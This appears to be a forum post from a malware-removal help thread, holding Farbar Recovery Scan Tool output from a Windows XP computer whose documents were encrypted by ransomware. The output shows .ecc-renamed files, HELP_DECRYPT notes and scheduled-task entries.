2015-02-26 07:51 - 2014-02-05 15:03 - 00009028 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140205150354.pdf.ecc
2015-02-26 07:51 - 2014-01-29 09:41 - 00112324 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140129094138.pdf.ecc
2015-02-26 07:51 - 2014-01-29 09:40 - 00083124 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140129094001.pdf.ecc
2015-02-26 07:51 - 2014-01-22 12:53 - 00091524 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140122125316.pdf.ecc
2015-02-26 07:51 - 2014-01-22 12:50 - 00085764 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140122125028.pdf.ecc
2015-02-26 07:51 - 2014-01-22 12:45 - 00089924 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140122124539.pdf.ecc
2015-02-26 07:51 - 2014-01-20 16:50 - 00066932 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140120165006.pdf.ecc
2015-02-26 07:51 - 2014-01-20 16:04 - 00075508 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140120160445.pdf.ecc
2015-02-26 07:51 - 2014-01-20 14:43 - 00066388 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140120144356.pdf.ecc
2015-02-26 07:51 - 2014-01-20 09:23 - 00082420 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140120092332.pdf.ecc
2015-02-26 07:51 - 2014-01-08 17:01 - 00057316 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140108170158.pdf.ecc
2015-02-26 07:51 - 2014-01-08 09:04 - 00019700 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140108090459.pdf.ecc
2015-02-26 07:51 - 2014-01-07 13:12 - 00005220 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140107131224.pdf.ecc
2015-02-26 07:51 - 2014-01-06 16:30 - 00020660 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140106163029.pdf.ecc
2015-02-26 07:51 - 2013-12-27 14:57 - 00190612 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131227145734.pdf.ecc
2015-02-26 07:51 - 2013-12-20 09:27 - 00065828 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131220092757.pdf.ecc
2015-02-26 07:51 - 2013-12-20 09:24 - 00062148 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131220092448.pdf.ecc
2015-02-26 07:51 - 2013-12-19 12:01 - 00012836 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131219120141.pdf.ecc
2015-02-26 07:51 - 2013-12-16 16:02 - 00076180 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131216160247.pdf.ecc
2015-02-26 07:51 - 2013-12-16 16:01 - 00032980 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131216160117.pdf.ecc
2015-02-26 07:51 - 2013-12-13 15:40 - 00074132 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131213154009.pdf.ecc
2015-02-26 07:51 - 2013-12-10 07:52 - 00009044 _____ () C:\Documents and Settings\Maureen\My Documents\Emidy.pdf.ecc
2015-02-26 07:51 - 2013-12-10 07:50 - 00004772 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131210075017.pdf.ecc
2015-02-26 07:51 - 2013-12-05 14:36 - 00054020 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131205143616.pdf.ecc
2015-02-26 07:51 - 2013-12-04 15:36 - 00101124 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131204153656.pdf.ecc
2015-02-26 07:51 - 2013-12-02 12:19 - 00099780 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131202121943.pdf.ecc
2015-02-26 07:51 - 2013-11-29 15:42 - 00136948 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131129154246.pdf.ecc
2015-02-26 07:51 - 2013-11-26 12:14 - 00109156 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131126121406.pdf.ecc
2015-02-26 07:51 - 2013-11-26 12:11 - 00134292 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131126121130.pdf.ecc
2015-02-26 07:51 - 2013-11-26 08:42 - 00081956 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131126084257.pdf.ecc
2015-02-26 07:51 - 2013-11-21 15:52 - 00198948 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131121155223.pdf.ecc
2015-02-26 07:51 - 2013-11-13 10:55 - 00010964 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131113105547.pdf.ecc
2015-02-26 07:51 - 2013-11-12 15:42 - 00086596 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131112154214.pdf.ecc
2015-02-26 07:51 - 2013-11-12 15:40 - 00094260 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131112154007.pdf.ecc
2015-02-26 07:51 - 2013-11-12 15:32 - 00049236 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131112153234.pdf.ecc
2015-02-26 07:51 - 2013-11-12 15:30 - 00098148 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131112153050.pdf.ecc
2015-02-26 07:51 - 2013-11-12 15:28 - 00094980 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131112152849.pdf.ecc
2015-02-26 07:51 - 2013-11-12 15:27 - 00094692 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131112152754.pdf.ecc
2015-02-26 07:51 - 2013-11-12 15:26 - 00094756 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131112152641.pdf.ecc
2015-02-26 07:51 - 2013-11-11 14:11 - 00072596 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131111141103.pdf.ecc
2015-02-26 07:51 - 2013-11-11 12:03 - 00117604 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131111120334.pdf.ecc
2015-02-26 07:51 - 2013-11-11 11:03 - 00129140 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131111110358.pdf.ecc
2015-02-26 07:51 - 2013-11-11 11:01 - 00119204 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131111110156.pdf.ecc
2015-02-26 07:51 - 2013-11-11 10:30 - 00176724 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131111103023.pdf.ecc
2015-02-26 07:51 - 2013-11-07 15:35 - 00068548 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131107153529.pdf.ecc
2015-02-26 07:51 - 2013-11-01 07:29 - 00072276 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131101082924.pdf.ecc
2015-02-26 07:51 - 2013-10-31 13:01 - 00025204 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131031140159.pdf.ecc
2015-02-26 07:51 - 2013-10-31 12:18 - 00022276 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131031131825.pdf.ecc
2015-02-26 07:51 - 2013-10-31 10:13 - 00245780 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131031111336.pdf.ecc
2015-02-26 07:51 - 2013-10-29 11:41 - 00030324 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131029124133.pdf.ecc
2015-02-26 07:51 - 2013-10-25 07:57 - 00032212 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131025085712.pdf.ecc
2015-02-26 07:51 - 2013-10-23 11:32 - 00029604 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131023123240.pdf.ecc
2015-02-26 07:51 - 2013-10-23 09:31 - 00117844 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131023103113.pdf.ecc
2015-02-26 07:51 - 2013-10-23 09:30 - 00116068 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131023103002.pdf.ecc
2015-02-26 07:51 - 2013-10-18 07:59 - 00027620 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131018085911.pdf.ecc
2015-02-26 07:51 - 2013-10-17 10:46 - 00025172 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131017114632.pdf.ecc
2015-02-26 07:51 - 2013-10-17 10:44 - 00025060 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131017114455.pdf.ecc
2015-02-26 07:51 - 2013-10-17 10:12 - 00047956 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131017111202.pdf.ecc
2015-02-26 07:51 - 2013-10-16 08:37 - 00290868 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131016093745.pdf.ecc
2015-02-26 07:51 - 2013-10-16 08:20 - 00116132 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131016092022.pdf.ecc
2015-02-26 07:51 - 2013-10-16 08:13 - 00092388 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131016091334.pdf.ecc
2015-02-26 07:51 - 2013-10-10 13:58 - 00081620 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131010145837.pdf.ecc
2015-02-26 07:51 - 2013-10-10 13:48 - 00243028 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131010144852.pdf.ecc
2015-02-26 07:51 - 2013-10-10 13:39 - 00079524 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131010143918.pdf.ecc
2015-02-26 07:51 - 2013-10-10 13:22 - 00079204 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131010142231.pdf.ecc
2015-02-26 07:51 - 2013-10-10 13:18 - 00078772 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131010141830.pdf.ecc
2015-02-26 07:51 - 2013-10-07 15:43 - 00054548 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131007164343.pdf.ecc
2015-02-26 07:51 - 2013-10-07 13:57 - 00117092 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131007145758.pdf.ecc
2015-02-26 07:51 - 2013-10-07 08:55 - 00008100 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131007095554.pdf.ecc
2015-02-26 07:51 - 2013-10-07 07:59 - 00014948 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131007085932.pdf.ecc
2015-02-26 07:51 - 2013-10-02 07:23 - 00100932 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131002082303.pdf.ecc
2015-02-26 07:51 - 2013-10-02 07:21 - 00074020 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20131002082119.pdf.ecc
2015-02-26 07:51 - 2013-09-25 09:38 - 00072084 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130925103806.pdf.ecc
2015-02-26 07:51 - 2013-09-24 15:40 - 00072724 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130924164023.pdf.ecc
2015-02-26 07:51 - 2013-09-24 10:56 - 00054580 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130924115606.pdf.ecc
2015-02-26 07:51 - 2013-09-24 10:48 - 00518964 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130924114859.pdf.ecc
2015-02-26 07:51 - 2013-09-24 10:38 - 00194916 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130924113859.pdf.ecc
2015-02-26 07:51 - 2013-09-24 10:36 - 00131940 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130924113629.pdf.ecc
2015-02-26 07:51 - 2013-09-24 10:34 - 00102676 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130924113404.pdf.ecc
2015-02-26 07:51 - 2013-09-24 10:32 - 00039380 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130924113244.pdf.ecc
2015-02-26 07:51 - 2013-09-24 08:34 - 00038436 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130924093429.pdf.ecc
2015-02-26 07:51 - 2013-09-24 08:18 - 00054116 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130924091824.pdf.ecc
2015-02-26 07:51 - 2013-09-20 10:26 - 00084084 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130920112627.pdf.ecc
2015-02-26 07:51 - 2013-09-19 12:28 - 00067732 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130919132846.pdf.ecc
2015-02-26 07:51 - 2013-09-16 11:25 - 00095764 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130916122548.pdf.ecc
2015-02-26 07:51 - 2013-09-16 11:24 - 00033332 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130916122435.pdf.ecc
2015-02-26 07:51 - 2013-09-10 07:46 - 00127748 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130910084627.pdf.ecc
2015-02-26 07:51 - 2013-09-06 13:26 - 00122756 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130906142601.pdf.ecc
2015-02-26 07:51 - 2013-09-06 13:23 - 00122436 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130906142330.pdf.ecc
2015-02-26 07:51 - 2013-09-06 09:37 - 00039780 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130906103744.pdf.ecc
2015-02-26 07:51 - 2013-09-05 10:45 - 00017668 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130905114558.pdf.ecc
2015-02-26 07:51 - 2013-09-05 08:50 - 00039892 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130905095048.pdf.ecc
2015-02-26 07:51 - 2013-09-04 07:57 - 00027556 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130904085758.pdf.ecc
2015-02-26 07:51 - 2013-09-04 07:56 - 00071396 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130904085635.pdf.ecc
2015-02-26 07:51 - 2013-09-03 15:05 - 00017396 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130903160502.pdf.ecc
2015-02-26 07:51 - 2013-09-03 08:58 - 00046004 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130903095827.pdf.ecc
2015-02-26 07:51 - 2013-09-03 08:52 - 00044180 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130903095251.pdf.ecc
2015-02-26 07:51 - 2013-09-03 08:51 - 00044228 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130903095145.pdf.ecc
2015-02-26 07:51 - 2013-09-02 16:14 - 00042260 _____ () C:\Documents and Settings\Maureen\My Documents\Millikin 2nd floor draft.pdf.ecc
2015-02-26 07:51 - 2013-09-02 16:13 - 00037988 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130902171358.pdf.ecc
2015-02-26 07:51 - 2013-08-27 07:09 - 00087796 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130827080958.pdf.ecc
2015-02-26 07:51 - 2013-08-20 11:29 - 00082532 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130820122915.pdf.ecc
2015-02-26 07:51 - 2013-08-19 10:23 - 00026996 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130819112352.pdf.ecc
2015-02-26 07:51 - 2013-08-19 10:12 - 00027860 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130819111224.pdf.ecc
2015-02-26 07:51 - 2013-08-14 12:40 - 00036020 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130814134055.pdf.ecc
2015-02-26 07:51 - 2013-08-13 11:23 - 00011156 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130813122345.pdf.ecc
2015-02-26 07:51 - 2013-08-13 10:20 - 00013316 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130813112011.pdf.ecc
2015-02-26 07:51 - 2013-08-13 10:06 - 00009060 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130813110657.pdf.ecc
2015-02-26 07:51 - 2013-08-09 10:36 - 00046404 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130809113653.pdf.ecc
2015-02-26 07:51 - 2013-08-08 17:31 - 00041380 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130808183153.pdf.ecc
2015-02-26 07:51 - 2013-08-08 08:08 - 00017284 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130808090846.pdf.ecc
2015-02-26 07:51 - 2013-08-07 10:19 - 00062740 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130807111939.pdf.ecc
2015-02-26 07:51 - 2013-08-06 15:02 - 00044196 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130806160238.pdf.ecc
2015-02-26 07:51 - 2013-08-06 15:00 - 00106084 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130806160008.pdf.ecc
2015-02-26 07:51 - 2013-08-05 15:32 - 00047124 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130805163212.pdf.ecc
2015-02-26 07:51 - 2013-07-31 09:23 - 00070052 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130731102306.pdf.ecc
2015-02-26 07:51 - 2013-07-29 08:31 - 00026276 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130729093149.pdf.ecc
2015-02-26 07:51 - 2013-07-26 11:00 - 00060772 _____ () C:\Documents and Settings\Maureen\My Documents\Horace Mann PO.pdf.ecc
2015-02-26 07:51 - 2013-07-26 11:00 - 00056500 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130726120011.pdf.ecc
2015-02-26 07:51 - 2013-07-25 11:14 - 00090740 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130725121445.pdf.ecc
2015-02-26 07:51 - 2013-07-23 15:00 - 00016452 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130723160008.pdf.ecc
2015-02-26 07:51 - 2013-07-23 05:49 - 00010468 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130723064931.pdf.ecc
2015-02-26 07:51 - 2013-07-17 08:43 - 00161876 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130717094310.pdf.ecc
2015-02-26 07:51 - 2013-07-16 07:21 - 00037060 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130716082128.pdf.ecc
2015-02-26 07:51 - 2013-07-16 07:18 - 00026692 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130716081819.pdf.ecc
2015-02-26 07:51 - 2013-07-16 06:52 - 00126356 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130716075233.pdf.ecc
2015-02-26 07:51 - 2013-07-15 11:51 - 00170996 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130715125159.pdf.ecc
2015-02-26 07:50 - 2013-07-15 11:49 - 00140724 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130715124935.pdf.ecc
2015-02-26 07:50 - 2013-07-15 11:47 - 00176980 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130715124750.pdf.ecc
2015-02-26 07:50 - 2013-07-15 11:43 - 00056468 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130715124308.pdf.ecc
2015-02-26 07:50 - 2013-07-15 10:12 - 00069348 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130715111228.pdf.ecc
2015-02-26 07:50 - 2013-07-15 09:54 - 00005076 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130715105459.pdf.ecc
2015-02-26 07:50 - 2013-07-12 14:23 - 00129460 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20130712152328.pdf.ecc
2015-02-25 19:34 - 2014-12-08 01:46 - 00000000 ____D () C:\Documents and Settings\NetworkService\Application Data\Adobe
2015-02-25 17:15 - 2015-01-09 14:32 - 00000000 ____D () C:\Documents and Settings\Maureen\Desktop\Old Colony paint spec
2015-02-25 17:15 - 2014-12-30 14:52 - 00118276 _____ () C:\Documents and Settings\Maureen\Desktop\Old Colony Planning Council.pdf.ecc
2015-02-25 17:15 - 2014-10-30 12:15 - 00643508 _____ () C:\Documents and Settings\Maureen\Desktop\Leonard Lumber Account Info.pdf.ecc
2015-02-25 17:15 - 2014-07-18 07:33 - 00027252 _____ () C:\Documents and Settings\Maureen\Desktop\Klingspor Account Application.pdf.ecc
2015-02-25 17:15 - 2014-06-17 08:20 - 00024388 _____ () C:\Documents and Settings\Maureen\Desktop\Phone Numbers.doc.ecc
2015-02-25 17:15 - 2013-09-27 14:02 - 00083508 _____ () C:\Documents and Settings\Maureen\Desktop\Prevailing Wage Form.pdf.ecc
2015-02-25 17:15 - 2013-07-07 19:24 - 00000000 ____D () C:\Documents and Settings\Maureen\Desktop\Job Clock
2015-02-25 17:15 - 2013-07-07 18:08 - 00000000 ____D () C:\Documents and Settings\Maureen\Desktop\Jobclock Information
2015-02-25 17:15 - 2013-07-07 18:07 - 00000000 ____D () C:\Documents and Settings\Maureen\Desktop\Workers Comp
2015-02-25 17:15 - 2013-07-07 18:07 - 00000000 ____D () C:\Documents and Settings\Maureen\Desktop\Stadium Cert Payroll
2015-02-25 17:13 - 2013-07-07 18:08 - 00000000 ____D () C:\Documents and Settings\Maureen\Desktop\Fax Cover Sheets
2015-02-25 17:12 - 2014-08-13 15:32 - 00677604 _____ () C:\Documents and Settings\Maureen\Desktop\APG Insurance Cert.pdf.ecc
2015-02-25 17:12 - 2014-04-22 12:36 - 00058916 _____ () C:\Documents and Settings\Maureen\Desktop\APG Insurance Certificate 2014.pdf.ecc
2015-02-25 17:12 - 2013-12-27 10:58 - 00704148 _____ () C:\Documents and Settings\Maureen\Desktop\APG Ins Cert 2013-2014.pdf.ecc
2015-02-25 17:12 - 2013-07-15 10:13 - 00073636 _____ () C:\Documents and Settings\Maureen\Desktop\APG Insurance Certificate.pdf.ecc
2015-02-25 17:12 - 2013-07-07 18:08 - 00000000 ____D () C:\Documents and Settings\Maureen\Desktop\APG Info
2015-02-25 17:12 - 2013-07-07 18:07 - 11474372 _____ () C:\Documents and Settings\Maureen\Desktop\APG Letter Head.rtf.ecc
2015-02-25 17:12 - 2013-07-07 18:07 - 00182724 _____ () C:\Documents and Settings\Maureen\Desktop\Commercial Roofing License Requirements.pdf.ecc
2015-02-25 17:12 - 2013-07-07 18:07 - 00033892 _____ () C:\Documents and Settings\Maureen\Desktop\APG Resume.pdf.ecc
2015-02-25 16:59 - 2015-01-08 15:31 - 00453268 _____ () C:\Documents and Settings\Maureen\Desktop\Additional Insured-Smithfield Exchange Bank.pdf.ecc
2015-02-25 16:59 - 2013-07-07 18:10 - 00000000 ____D () C:\Documents and Settings\Maureen\Desktop\ADP Payroll Sheets
2015-02-25 15:49 - 2014-12-05 23:04 - 00000000 ____D () C:\Documents and Settings\Maureen\Local Settings\Application Data\Google
2015-02-25 15:49 - 2013-07-09 09:42 - 00000000 ____D () C:\Documents and Settings\Maureen\Local Settings\Application Data\Adobe
2015-02-25 14:59 - 2013-12-05 12:51 - 00000000 ____D () C:\Documents and Settings\Maureen\Application Data\Leadertech
2015-02-25 14:59 - 2013-07-10 14:23 - 00000000 ____D () C:\Documents and Settings\Maureen\Application Data\Adobe
2015-02-25 14:58 - 2013-07-09 09:47 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\McAfee
2015-02-25 13:52 - 2014-09-10 15:33 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Hewlett-Packard
2015-02-25 13:52 - 2013-07-09 09:43 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Adobe
2015-02-25 13:40 - 2013-07-10 15:19 - 00000000 ____D () C:\Canon
2015-02-12 14:22 - 2014-04-14 16:52 - 00041616 _____ (iolo technologies, LLC) C:\WINDOWS\system32\iolobtdfg.exe
2015-02-12 14:22 - 2014-04-14 16:52 - 00023568 _____ (iolo technologies, LLC) C:\WINDOWS\system32\smrgdf.exe
2015-02-12 14:04 - 2014-04-14 16:53 - 02096960 _____ (iolo technologies, LLC) C:\WINDOWS\system32\Incinerator32.dll
2015-02-12 13:58 - 2014-04-14 16:52 - 00069016 _____ (Raxco Software, Inc.) C:\WINDOWS\system32\Drivers\PDFsFilter.sys
2015-02-11 03:13 - 2013-08-09 02:00 - 00000000 ____D () C:\WINDOWS\system32\MRT
2015-02-11 03:00 - 2013-07-07 18:36 - 113756392 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2015-02-09 08:25 - 2014-03-30 13:51 - 00000220 _____ () C:\WINDOWS\Tasks\Microsoft Windows XP End of Service Notification Monthly.job
2015-02-06 09:58 - 2013-07-07 18:07 - 00002483 _____ () C:\Documents and Settings\Maureen\Desktop\Microsoft Word.lnk

==================== Files in the root of some directories =======

2015-03-05 21:34 - 2015-03-05 21:34 - 0023040 _____ () C:\Documents and Settings\Maureen\Application Data\07 With Ice, Anent The Steam.mp3
2015-02-25 14:59 - 2015-02-25 14:59 - 0008604 _____ () C:\Documents and Settings\Maureen\Application Data\HELP_DECRYPT.HTML
2015-02-25 14:59 - 2015-02-25 14:59 - 0045854 _____ () C:\Documents and Settings\Maureen\Application Data\HELP_DECRYPT.PNG
2015-02-25 14:59 - 2015-02-25 14:59 - 0000288 _____ () C:\Documents and Settings\Maureen\Application Data\HELP_DECRYPT.URL
2015-02-25 13:57 - 2015-02-25 13:57 - 0000636 _____ () C:\Documents and Settings\Maureen\Application Data\key.dat
2015-02-25 13:57 - 2015-02-26 08:23 - 66112650 _____ () C:\Documents and Settings\Maureen\Application Data\log.html
2015-03-06 18:16 - 2015-03-06 18:16 - 0001324 _____ () C:\Documents and Settings\Maureen\Local Settings\Application Data\d3d9caps.tmp
2015-02-25 19:19 - 2015-02-25 19:19 - 0008604 _____ () C:\Documents and Settings\Maureen\Local Settings\Application Data\HELP_DECRYPT.HTML
2015-02-25 19:19 - 2015-02-25 19:19 - 0045854 _____ () C:\Documents and Settings\Maureen\Local Settings\Application Data\HELP_DECRYPT.PNG
2015-02-25 19:19 - 2015-02-25 19:19 - 0000288 _____ () C:\Documents and Settings\Maureen\Local Settings\Application Data\HELP_DECRYPT.URL
2015-02-25 14:58 - 2015-02-25 14:58 - 0008604 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.HTML
2015-02-25 14:58 - 2015-02-25 14:58 - 0045854 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.PNG
2015-02-25 14:58 - 2015-02-25 14:58 - 0000288 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.URL

Files to move or delete:
====================
C:\Windows\Tasks\At1.job
C:\Windows\Tasks\At2.job
C:\Windows\Tasks\At3.job
C:\Windows\Tasks\At4.job


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

==================== End Of Log ============================

Link to post
Share on other sites

Addition.txt:

 

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 04-03-2015
Ran by Maureen at 2015-03-07 19:16:04
Running from C:\Documents and Settings\Maureen\Desktop\AV SOFTWARES\FRST [2015-03-04]
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

